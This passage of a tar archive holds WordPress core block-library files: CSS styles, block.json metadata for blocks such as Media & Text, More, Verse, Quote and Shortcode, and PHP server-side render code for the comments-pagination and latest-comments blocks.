}media-text/style-rtl.min.css000060400000003745151330427370012052 0ustar00.wp-block-media-text{box-sizing:border-box;direction:ltr;display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{align-self:start}.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{align-self:end}.wp-block-media-text>.wp-block-media-text__media{grid-column:1;grid-row:1;margin:0}.wp-block-media-text>.wp-block-media-text__content{direction:rtl;grid-column:2;grid-row:1;padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{grid-column:2;grid-row:1}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{grid-column:1;grid-row:1}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media img{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;clip:rect(0,0,0,0);border:0}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{grid-column:1;grid-row:2}}media-text/editor.min.css000060400000001263151330427370011372 0ustar00.wp-block-media-text__media{position:relative}.wp-block-media-text__media.is-transient img{opacity:.3}.wp-block-media-text__media .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.wp-block-media-text .__resizable_base__{grid-column:1/span 2;grid-row:2}.wp-block-media-text .editor-media-container__resizer{width:100%!important}.wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer{height:100%!important}.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{max-width:unset}.wp-block-media-text--placeholder-image{min-height:205px}media-text/style-rtl.css000060400000004274151330427370011266 0ustar00.wp-block-media-text{
  box-sizing:border-box;
  direction:ltr;
  display:grid;
  grid-template-columns:50% 1fr;
  grid-template-rows:auto;
}
.wp-block-media-text.has-media-on-the-right{
  grid-template-columns:1fr 50%;
}

.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{
  align-self:start;
}

.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{
  align-self:center;
}

.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{
  align-self:end;
}

.wp-block-media-text>.wp-block-media-text__media{
  grid-column:1;
  grid-row:1;
  margin:0;
}

.wp-block-media-text>.wp-block-media-text__content{
  direction:rtl;
  grid-column:2;
  grid-row:1;
  padding:0 8%;
  word-break:break-word;
}

.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{
  grid-column:2;
  grid-row:1;
}

.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{
  grid-column:1;
  grid-row:1;
}

.wp-block-media-text__media img,.wp-block-media-text__media video{
  height:auto;
  max-width:unset;
  vertical-align:middle;
  width:100%;
}

.wp-block-media-text.is-image-fill>.wp-block-media-text__media{
  background-size:cover;
  height:100%;
  min-height:250px;
}

.wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{
  display:block;
  height:100%;
}

.wp-block-media-text.is-image-fill>.wp-block-media-text__media img{
  height:1px;
  margin:-1px;
  overflow:hidden;
  padding:0;
  position:absolute;
  width:1px;
  clip:rect(0, 0, 0, 0);
  border:0;
}
@media (max-width:600px){
  .wp-block-media-text.is-stacked-on-mobile{
    grid-template-columns:100% !important;
  }
  .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{
    grid-column:1;
    grid-row:1;
  }
  .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{
    grid-column:1;
    grid-row:2;
  }
}media-text/editor-rtl.min.css000060400000001265151330427370012173 0ustar00.wp-block-media-text__media{position:relative}.wp-block-media-text__media.is-transient img{opacity:.3}.wp-block-media-text__media .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.wp-block-media-text .__resizable_base__{grid-column:1/span 2;grid-row:2}.wp-block-media-text .editor-media-container__resizer{width:100%!important}.wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer{height:100%!important}.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{max-width:unset}.wp-block-media-text--placeholder-image{min-height:205px}media-text/block.json000060400000005351151330427370010577 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/media-text",
	"title": "Media & Text",
	"category": "media",
	"description": "Set media and words side-by-side for a richer layout.",
	"keywords": [ "image", "video" ],
	"textdomain": "default",
	"attributes": {
		"align": {
			"type": "string",
			"default": "none"
		},
		"mediaAlt": {
			"type": "string",
			"source": "attribute",
			"selector": "figure img",
			"attribute": "alt",
			"default": "",
			"__experimentalRole": "content"
		},
		"mediaPosition": {
			"type": "string",
			"default": "left"
		},
		"mediaId": {
			"type": "number",
			"__experimentalRole": "content"
		},
		"mediaUrl": {
			"type": "string",
			"source": "attribute",
			"selector": "figure video,figure img",
			"attribute": "src",
			"__experimentalRole": "content"
		},
		"mediaLink": {
			"type": "string"
		},
		"linkDestination": {
			"type": "string"
		},
		"linkTarget": {
			"type": "string",
			"source": "attribute",
			"selector": "figure a",
			"attribute": "target"
		},
		"href": {
			"type": "string",
			"source": "attribute",
			"selector": "figure a",
			"attribute": "href",
			"__experimentalRole": "content"
		},
		"rel": {
			"type": "string",
			"source": "attribute",
			"selector": "figure a",
			"attribute": "rel"
		},
		"linkClass": {
			"type": "string",
			"source": "attribute",
			"selector": "figure a",
			"attribute": "class"
		},
		"mediaType": {
			"type": "string",
			"__experimentalRole": "content"
		},
		"mediaWidth": {
			"type": "number",
			"default": 50
		},
		"mediaSizeSlug": {
			"type": "string"
		},
		"isStackedOnMobile": {
			"type": "boolean",
			"default": true
		},
		"verticalAlignment": {
			"type": "string"
		},
		"imageFill": {
			"type": "boolean"
		},
		"focalPoint": {
			"type": "object"
		},
		"allowedBlocks": {
			"type": "array"
		},
		"useFeaturedImage": {
			"type": "boolean",
			"default": false
		}
	},
	"usesContext": [ "postId", "postType" ],
	"supports": {
		"anchor": true,
		"align": [ "wide", "full" ],
		"html": false,
		"color": {
			"gradients": true,
			"heading": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-media-text-editor",
	"style": "wp-block-media-text"
}
more/block.json000060400000001174151330427370007477 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/more",
	"title": "More",
	"category": "design",
	"description": "Content before this block will be shown in the excerpt on your archives page.",
	"keywords": [ "read more" ],
	"textdomain": "default",
	"attributes": {
		"customText": {
			"type": "string",
			"default": ""
		},
		"noTeaser": {
			"type": "boolean",
			"default": false
		}
	},
	"supports": {
		"customClassName": false,
		"className": false,
		"html": false,
		"multiple": false,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-more-editor"
}
more/editor.min.css000060400000001333151330427370010271 0ustar00.block-editor-block-list__block[data-type="core/more"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-more{display:block;text-align:center;white-space:nowrap}.wp-block-more input[type=text]{background:#fff;border:none;border-radius:4px;box-shadow:none;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;margin:0;max-width:100%;padding:6px 8px;position:relative;text-align:center;text-transform:uppercase;white-space:nowrap}.wp-block-more input[type=text]:focus{box-shadow:none}.wp-block-more:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}more/editor.css000060400000001504151330427370007507 0ustar00.block-editor-block-list__block[data-type="core/more"]{
  margin-bottom:28px;
  margin-top:28px;
  max-width:100%;
  text-align:center;
}

.wp-block-more{
  display:block;
  text-align:center;
  white-space:nowrap;
}
.wp-block-more input[type=text]{
  background:#fff;
  border:none;
  border-radius:4px;
  box-shadow:none;
  color:#757575;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  font-weight:600;
  height:24px;
  margin:0;
  max-width:100%;
  padding:6px 8px;
  position:relative;
  text-align:center;
  text-transform:uppercase;
  white-space:nowrap;
}
.wp-block-more input[type=text]:focus{
  box-shadow:none;
}
.wp-block-more:before{
  border-top:3px dashed #ccc;
  content:"";
  left:0;
  position:absolute;
  right:0;
  top:50%;
}more/editor-rtl.min.css000060400000001333151330427370011070 0ustar00.block-editor-block-list__block[data-type="core/more"]{margin-bottom:28px;margin-top:28px;max-width:100%;text-align:center}.wp-block-more{display:block;text-align:center;white-space:nowrap}.wp-block-more input[type=text]{background:#fff;border:none;border-radius:4px;box-shadow:none;color:#757575;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:600;height:24px;margin:0;max-width:100%;padding:6px 8px;position:relative;text-align:center;text-transform:uppercase;white-space:nowrap}.wp-block-more input[type=text]:focus{box-shadow:none}.wp-block-more:before{border-top:3px dashed #ccc;content:"";left:0;position:absolute;right:0;top:50%}more/editor-rtl.css000060400000001504151330427370010306 0ustar00.block-editor-block-list__block[data-type="core/more"]{
  margin-bottom:28px;
  margin-top:28px;
  max-width:100%;
  text-align:center;
}

.wp-block-more{
  display:block;
  text-align:center;
  white-space:nowrap;
}
.wp-block-more input[type=text]{
  background:#fff;
  border:none;
  border-radius:4px;
  box-shadow:none;
  color:#757575;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  font-weight:600;
  height:24px;
  margin:0;
  max-width:100%;
  padding:6px 8px;
  position:relative;
  text-align:center;
  text-transform:uppercase;
  white-space:nowrap;
}
.wp-block-more input[type=text]:focus{
  box-shadow:none;
}
.wp-block-more:before{
  border-top:3px dashed #ccc;
  content:"";
  left:0;
  position:absolute;
  right:0;
  top:50%;
}comments-pagination-next.php000060400000003544151330427370012214 0ustar00<?php
/**
 * Server-side rendering of the `core/comments-pagination-next` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comments-pagination-next` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 *
 * @return string Returns the next comments link for the query pagination.
 */
function render_block_core_comments_pagination_next( $attributes, $content, $block ) {
	// Bail out early if the post ID is not set for some reason.
	if ( empty( $block->context['postId'] ) ) {
		return '';
	}

	$comment_vars     = build_comment_query_vars_from_block( $block );
	$max_page         = ( new WP_Comment_Query( $comment_vars ) )->max_num_pages;
	$default_label    = __( 'Newer Comments' );
	$label            = isset( $attributes['label'] ) && ! empty( $attributes['label'] ) ? $attributes['label'] : $default_label;
	$pagination_arrow = get_comments_pagination_arrow( $block, 'next' );

	$filter_link_attributes = static function () {
		return get_block_wrapper_attributes();
	};
	add_filter( 'next_comments_link_attributes', $filter_link_attributes );

	if ( $pagination_arrow ) {
		$label .= $pagination_arrow;
	}

	$next_comments_link = get_next_comments_link( $label, $max_page );

	remove_filter( 'next_posts_link_attributes', $filter_link_attributes );

	if ( ! isset( $next_comments_link ) ) {
		return '';
	}
	return $next_comments_link;
}


/**
 * Registers the `core/comments-pagination-next` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comments_pagination_next() {
	register_block_type_from_metadata(
		__DIR__ . '/comments-pagination-next',
		array(
			'render_callback' => 'render_block_core_comments_pagination_next',
		)
	);
}
add_action( 'init', 'register_block_core_comments_pagination_next' );
comments-pagination-numbers/editor-rtl.css000060400000000345151330427370014773 0ustar00.wp-block-comments-pagination-numbers a{
  text-decoration:underline;
}
.wp-block-comments-pagination-numbers .page-numbers{
  margin-left:2px;
}
.wp-block-comments-pagination-numbers .page-numbers:last-child{
  margin-right:0;
}comments-pagination-numbers/editor-rtl.min.css000060400000000324151330427370015552 0ustar00.wp-block-comments-pagination-numbers a{text-decoration:underline}.wp-block-comments-pagination-numbers .page-numbers{margin-left:2px}.wp-block-comments-pagination-numbers .page-numbers:last-child{margin-right:0}comments-pagination-numbers/block.json000060400000001665151330427370014167 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comments-pagination-numbers",
	"title": "Comments Page Numbers",
	"category": "theme",
	"parent": [ "core/comments-pagination" ],
	"description": "Displays a list of page numbers for comments pagination.",
	"textdomain": "default",
	"usesContext": [ "postId" ],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
comments-pagination-numbers/editor.min.css000060400000000325151330427370014754 0ustar00.wp-block-comments-pagination-numbers a{text-decoration:underline}.wp-block-comments-pagination-numbers .page-numbers{margin-right:2px}.wp-block-comments-pagination-numbers .page-numbers:last-child{margin-right:0}comments-pagination-numbers/editor.css000060400000000346151330427370014175 0ustar00.wp-block-comments-pagination-numbers a{
  text-decoration:underline;
}
.wp-block-comments-pagination-numbers .page-numbers{
  margin-right:2px;
}
.wp-block-comments-pagination-numbers .page-numbers:last-child{
  margin-right:0;
}latest-comments.php000060400000011660151330427370010401 0ustar00<?php
/**
 * Server-side rendering of the `core/latest-comments` block.
 *
 * @package WordPress
 */

/**
 * Get the post title.
 *
 * The post title is fetched and if it is blank then a default string is
 * returned.
 *
 * Copied from `wp-admin/includes/template.php`, but we can't include that
 * file because:
 *
 * 1. It causes bugs with test fixture generation and strange Docker 255 error
 *    codes.
 * 2. It's in the admin; ideally we *shouldn't* be including files from the
 *    admin for a block's output. It's a very small/simple function as well,
 *    so duplicating it isn't too terrible.
 *
 * @since 3.3.0
 *
 * @param int|WP_Post $post Optional. Post ID or WP_Post object. Default is global $post.
 * @return string The post title if set; "(no title)" if no title is set.
 */
function wp_latest_comments_draft_or_post_title( $post = 0 ) {
	$title = get_the_title( $post );
	if ( empty( $title ) ) {
		$title = __( '(no title)' );
	}
	return $title;
}

/**
 * Renders the `core/latest-comments` block on server.
 *
 * @since 5.1.0
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the post content with latest comments added.
 */
function render_block_core_latest_comments( $attributes = array() ) {
	$comments = get_comments(
		/** This filter is documented in wp-includes/widgets/class-wp-widget-recent-comments.php */
		apply_filters(
			'widget_comments_args',
			array(
				'number'      => $attributes['commentsToShow'],
				'status'      => 'approve',
				'post_status' => 'publish',
			),
			array()
		)
	);

	$list_items_markup = '';
	if ( ! empty( $comments ) ) {
		// Prime the cache for associated posts. This is copied from \WP_Widget_Recent_Comments::widget().
		$post_ids = array_unique( wp_list_pluck( $comments, 'comment_post_ID' ) );
		_prime_post_caches( $post_ids, strpos( get_option( 'permalink_structure' ), '%category%' ), false );

		foreach ( $comments as $comment ) {
			$list_items_markup .= '<li class="wp-block-latest-comments__comment">';
			if ( $attributes['displayAvatar'] ) {
				$avatar = get_avatar(
					$comment,
					48,
					'',
					'',
					array(
						'class' => 'wp-block-latest-comments__comment-avatar',
					)
				);
				if ( $avatar ) {
					$list_items_markup .= $avatar;
				}
			}

			$list_items_markup .= '<article>';
			$list_items_markup .= '<footer class="wp-block-latest-comments__comment-meta">';
			$author_url         = get_comment_author_url( $comment );
			if ( empty( $author_url ) && ! empty( $comment->user_id ) ) {
				$author_url = get_author_posts_url( $comment->user_id );
			}

			$author_markup = '';
			if ( $author_url ) {
				$author_markup .= '<a class="wp-block-latest-comments__comment-author" href="' . esc_url( $author_url ) . '">' . get_comment_author( $comment ) . '</a>';
			} else {
				$author_markup .= '<span class="wp-block-latest-comments__comment-author">' . get_comment_author( $comment ) . '</span>';
			}

			// `_draft_or_post_title` calls `esc_html()` so we don't need to wrap that call in
			// `esc_html`.
			$post_title = '<a class="wp-block-latest-comments__comment-link" href="' . esc_url( get_comment_link( $comment ) ) . '">' . wp_latest_comments_draft_or_post_title( $comment->comment_post_ID ) . '</a>';

			$list_items_markup .= sprintf(
				/* translators: 1: author name (inside <a> or <span> tag, based on if they have a URL), 2: post title related to this comment */
				__( '%1$s on %2$s' ),
				$author_markup,
				$post_title
			);

			if ( $attributes['displayDate'] ) {
				$list_items_markup .= sprintf(
					'<time datetime="%1$s" class="wp-block-latest-comments__comment-date">%2$s</time>',
					esc_attr( get_comment_date( 'c', $comment ) ),
					date_i18n( get_option( 'date_format' ), get_comment_date( 'U', $comment ) )
				);
			}
			$list_items_markup .= '</footer>';
			if ( $attributes['displayExcerpt'] ) {
				$list_items_markup .= '<div class="wp-block-latest-comments__comment-excerpt">' . wpautop( get_comment_excerpt( $comment ) ) . '</div>';
			}
			$list_items_markup .= '</article></li>';
		}
	}

	$classnames = array();
	if ( $attributes['displayAvatar'] ) {
		$classnames[] = 'has-avatars';
	}
	if ( $attributes['displayDate'] ) {
		$classnames[] = 'has-dates';
	}
	if ( $attributes['displayExcerpt'] ) {
		$classnames[] = 'has-excerpts';
	}
	if ( empty( $comments ) ) {
		$classnames[] = 'no-comments';
	}
	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classnames ) ) );

	return ! empty( $comments ) ? sprintf(
		'<ol %1$s>%2$s</ol>',
		$wrapper_attributes,
		$list_items_markup
	) : sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		__( 'No comments to show.' )
	);
}

/**
 * Registers the `core/latest-comments` block.
 *
 * @since 5.3.0
 */
function register_block_core_latest_comments() {
	register_block_type_from_metadata(
		__DIR__ . '/latest-comments',
		array(
			'render_callback' => 'render_block_core_latest_comments',
		)
	);
}

add_action( 'init', 'register_block_core_latest_comments' );
require-static-blocks.php000060400000000765151330427370011502 0ustar00<?php

// This file was autogenerated by tools/release/sync-stable-blocks.js, do not change manually!
// Returns folder names for static blocks necessary for core blocks registration.
return array(
	'audio',
	'buttons',
	'code',
	'column',
	'columns',
	'details',
	'embed',
	'freeform',
	'group',
	'html',
	'list-item',
	'missing',
	'more',
	'nextpage',
	'paragraph',
	'preformatted',
	'pullquote',
	'quote',
	'separator',
	'social-links',
	'spacer',
	'table',
	'text-columns',
	'verse',
	'video',
);
query-pagination-numbers/block.json000060400000002106151330427370013476 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-pagination-numbers",
	"title": "Page Numbers",
	"category": "theme",
	"parent": [ "core/query-pagination" ],
	"description": "Displays a list of page numbers for pagination.",
	"textdomain": "default",
	"attributes": {
		"midSize": {
			"type": "number",
			"default": 2
		}
	},
	"usesContext": [ "queryId", "query", "enhancedPagination" ],
	"supports": {
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-query-pagination-numbers-editor"
}
query-pagination-numbers/editor-rtl.min.css000060400000000313151330427370015070 0ustar00.wp-block-query-pagination-numbers a{text-decoration:underline}.wp-block-query-pagination-numbers .page-numbers{margin-left:2px}.wp-block-query-pagination-numbers .page-numbers:last-child{margin-right:0}query-pagination-numbers/editor-rtl.css000060400000000334151330427370014311 0ustar00.wp-block-query-pagination-numbers a{
  text-decoration:underline;
}
.wp-block-query-pagination-numbers .page-numbers{
  margin-left:2px;
}
.wp-block-query-pagination-numbers .page-numbers:last-child{
  margin-right:0;
}query-pagination-numbers/editor.css000060400000000335151330427370013513 0ustar00.wp-block-query-pagination-numbers a{
  text-decoration:underline;
}
.wp-block-query-pagination-numbers .page-numbers{
  margin-right:2px;
}
.wp-block-query-pagination-numbers .page-numbers:last-child{
  margin-right:0;
}query-pagination-numbers/editor.min.css000060400000000314151330427370014272 0ustar00.wp-block-query-pagination-numbers a{text-decoration:underline}.wp-block-query-pagination-numbers .page-numbers{margin-right:2px}.wp-block-query-pagination-numbers .page-numbers:last-child{margin-right:0}verse/style-rtl.css000060400000000164151330427370010343 0ustar00pre.wp-block-verse{
  overflow:auto;
  white-space:pre-wrap;
}

:where(pre.wp-block-verse){
  font-family:inherit;
}verse/style.css000060400000000164151330427370007544 0ustar00pre.wp-block-verse{
  overflow:auto;
  white-space:pre-wrap;
}

:where(pre.wp-block-verse){
  font-family:inherit;
}verse/block.json000060400000002622151330427370007660 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/verse",
	"title": "Verse",
	"category": "text",
	"description": "Insert poetry. Use special spacing formats. Or quote song lyrics.",
	"keywords": [ "poetry", "poem" ],
	"textdomain": "default",
	"attributes": {
		"content": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "pre",
			"__unstablePreserveWhiteSpace": true,
			"__experimentalRole": "content"
		},
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"anchor": true,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"typography": {
			"fontSize": true,
			"__experimentalFontFamily": true,
			"lineHeight": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"__experimentalBorder": {
			"radius": true,
			"width": true,
			"color": true,
			"style": true
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"style": "wp-block-verse",
	"editorStyle": "wp-block-verse-editor"
}
verse/style.min.css000060400000000145151330427370010325 0ustar00pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}verse/style-rtl.min.css000060400000000145151330427370011124 0ustar00pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}shortcode/editor-rtl.css000060400000001212151330427370011332 0ustar00.blocks-shortcode__textarea{
  background:#fff !important;
  border:1px solid #1e1e1e !important;
  border-radius:2px !important;
  box-shadow:none !important;
  box-sizing:border-box;
  color:#1e1e1e !important;
  font-family:Menlo,Consolas,monaco,monospace !important;
  font-size:16px !important;
  max-height:250px;
  padding:12px !important;
  resize:none;
}
@media (min-width:600px){
  .blocks-shortcode__textarea{
    font-size:13px !important;
  }
}
.blocks-shortcode__textarea:focus{
  border-color:var(--wp-admin-theme-color) !important;
  box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important;
  outline:2px solid #0000 !important;
}shortcode/editor.css000060400000001212151330427370010533 0ustar00.blocks-shortcode__textarea{
  background:#fff !important;
  border:1px solid #1e1e1e !important;
  border-radius:2px !important;
  box-shadow:none !important;
  box-sizing:border-box;
  color:#1e1e1e !important;
  font-family:Menlo,Consolas,monaco,monospace !important;
  font-size:16px !important;
  max-height:250px;
  padding:12px !important;
  resize:none;
}
@media (min-width:600px){
  .blocks-shortcode__textarea{
    font-size:13px !important;
  }
}
.blocks-shortcode__textarea:focus{
  border-color:var(--wp-admin-theme-color) !important;
  box-shadow:0 0 0 1px var(--wp-admin-theme-color) !important;
  outline:2px solid #0000 !important;
}shortcode/editor.min.css000060400000001101151330427370011312 0ustar00.blocks-shortcode__textarea{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important;resize:none}@media (min-width:600px){.blocks-shortcode__textarea{font-size:13px!important}}.blocks-shortcode__textarea:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid #0000!important}shortcode/editor-rtl.min.css000060400000001101151330427370012111 0ustar00.blocks-shortcode__textarea{background:#fff!important;border:1px solid #1e1e1e!important;border-radius:2px!important;box-shadow:none!important;box-sizing:border-box;color:#1e1e1e!important;font-family:Menlo,Consolas,monaco,monospace!important;font-size:16px!important;max-height:250px;padding:12px!important;resize:none}@media (min-width:600px){.blocks-shortcode__textarea{font-size:13px!important}}.blocks-shortcode__textarea:focus{border-color:var(--wp-admin-theme-color)!important;box-shadow:0 0 0 1px var(--wp-admin-theme-color)!important;outline:2px solid #0000!important}shortcode/block.json000060400000000720151330427370010523 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/shortcode",
	"title": "Shortcode",
	"category": "widgets",
	"description": "Insert additional custom elements with a WordPress shortcode.",
	"textdomain": "default",
	"attributes": {
		"text": {
			"type": "string",
			"source": "raw"
		}
	},
	"supports": {
		"className": false,
		"customClassName": false,
		"html": false
	},
	"editorStyle": "wp-block-shortcode-editor"
}
quote/block.json000060400000003166151330427370007675 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/quote",
	"title": "Quote",
	"category": "text",
	"description": "Give quoted text visual emphasis. \"In quoting others, we cite ourselves.\" — Julio Cortázar",
	"keywords": [ "blockquote", "cite" ],
	"textdomain": "default",
	"attributes": {
		"value": {
			"type": "string",
			"source": "html",
			"selector": "blockquote",
			"multiline": "p",
			"default": "",
			"__experimentalRole": "content"
		},
		"citation": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "cite",
			"__experimentalRole": "content"
		},
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"anchor": true,
		"html": false,
		"__experimentalOnEnter": true,
		"__experimentalOnMerge": true,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"color": {
			"gradients": true,
			"heading": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"layout": {
			"allowEditing": false
		},
		"spacing": {
			"blockGap": true
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"styles": [
		{
			"name": "default",
			"label": "Default",
			"isDefault": true
		},
		{ "name": "plain", "label": "Plain" }
	],
	"editorStyle": "wp-block-quote-editor",
	"style": "wp-block-quote"
}
quote/style-rtl.min.css000060400000001272151330427370011137 0ustar00.wp-block-quote{box-sizing:border-box;overflow-wrap:break-word}.wp-block-quote.is-large:where(:not(.is-style-plain)),.wp-block-quote.is-style-large:where(:not(.is-style-plain)){margin-bottom:1em;padding:0 1em}.wp-block-quote.is-large:where(:not(.is-style-plain)) p,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) p{font-size:1.5em;font-style:italic;line-height:1.6}.wp-block-quote.is-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-large:where(:not(.is-style-plain)) footer,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) cite,.wp-block-quote.is-style-large:where(:not(.is-style-plain)) footer{font-size:1.125em;text-align:left}.wp-block-quote>cite{display:block}quote/theme-rtl.css000060400000001017151330427370010314 0ustar00.wp-block-quote{
  border-right:.25em solid;
  margin:0 0 1.75em;
  padding-right:1em;
}
.wp-block-quote cite,.wp-block-quote footer{
  color:currentColor;
  font-size:.8125em;
  font-style:normal;
  position:relative;
}
.wp-block-quote.has-text-align-right{
  border-left:.25em solid;
  border-right:none;
  padding-left:1em;
  padding-right:0;
}
.wp-block-quote.has-text-align-center{
  border:none;
